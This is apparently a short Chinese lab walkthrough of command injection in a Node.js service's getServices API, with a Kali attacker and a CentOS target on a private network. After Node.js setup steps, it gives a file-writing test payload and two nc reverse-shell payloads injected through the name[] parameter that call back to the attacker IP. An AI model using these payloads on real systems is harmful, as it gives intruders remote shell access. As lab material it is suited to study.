一、基本信息
攻击机:kali IP:192.168.100.60
靶机:CentOS7 IP:192.168.100.40
二、攻击过程
下载node.js环境
wget https://nodejs.org/dist/v12.18.4/node-v12.18.4-linux-x64.tar.xz
tar -xvf node-v12.18.4-linux-x64.tar.xz
mv node-v12.18.4-linux-x64 nodejs
mv nodejs/ /usr/local/sbin/
ln -s /usr/local/sbin/nodejs/bin/node /usr/local/bin/
ln -s /usr/local/sbin/nodejs/bin/npm /usr/local/bin/
进入指定目录
运行环境
浏览器测试
http://192.168.100.40:8000/api/getServices?name[]=$(echo -e 'zeeker' > test.txt)
测试结果
反弹shell
http://192.168.100.40:8000/api/getServices?name[]=$(nc -e /bin/bash 192.168.100.60 7777)
http://192.168.100.40:8000/api/getServices?name[]=$(nc 192.168.100.60 7777| /bin/bash | nc
192.168.100.60 8888)